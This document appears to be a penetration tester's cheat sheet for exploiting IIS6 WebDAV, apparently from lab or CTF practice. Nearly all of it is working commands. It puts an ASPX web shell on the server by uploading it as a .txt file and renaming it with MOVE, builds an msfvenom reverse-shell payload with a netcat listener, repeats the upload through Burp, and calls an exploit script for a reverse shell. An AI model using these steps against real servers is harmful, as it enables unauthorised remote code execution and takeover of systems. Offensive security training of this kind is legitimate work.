IIS6 WebDav

> davtest -url http://10.x.x.x

> cadaver http://10.x.x.x
d> ls                          ..list
d> put shell.aspx              ..403 Forbidden
d> put shell.txt               ..ok
d> move shell.txt shell.aspx   ..ok

------------------
Test:
curl -X PUT http://10.x.x.x/hello.txt -d @hello.txt
curl http://10.x.x.x/hello.txt

------------------
webshell:
cp /usr/share/webshells/aspx/cmdasp.aspx .
curl -X PUT http://10.x.x.x/payload.txt -d @cmdasp.aspx
curl -X MOVE -H 'Destination:http://10.x.x.x/payload.aspx' http://10.x.x.x/payload.txt
http://10.x.x.x/payload.aspx
Command: whoami 'execute' button
network service

------------------
reverse:
msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=4444 -f aspx > reverse.aspx
curl -X PUT http://10.x.x.x/reverse.txt --data-binary @reverse.aspx
curl -X MOVE -H 'Destination:http://10.x.x.x/reverse.aspx' http://10.x.x.x/reverse.txt
curl http://10.x.x.x/reverse.aspx
http://10.x.x.x/reverse.aspx
nc -nlvp 4444

Proxy 10.x.x.x: 80
Burp > Intercept
PUT  > Send to repeater
PUT /ippsec.html HTTP/1.1
this is a test
http://10.x.x.x/ippsec.html  .. works!

msfvenom -p windows/shell_reverse_tcp LHOST=10.x.x.x LPORT=4444 -f aspx
copy/paste the text of aspx msfvenom
paste into burp (bottom)
PUT /ippsec.html HTTP/1.1    ..html ok
PUT /ippsec.aspx HTTP/1.1    ..aspx forbidden!

OPTIONS / HTTP/1.1           ..shows list of webdav options
MOVE /ippsec.html HTTP/1.1   ..move html
Destination: /ippsec.aspx    ..aspx!
http://10.x.x.x/ippsec.aspx
nc -nvlp 4444
Connected!

> nc -nvlp 4444
> python ./iis6webdav.py 10.x.x.tgt 80 10.x.x.me 4444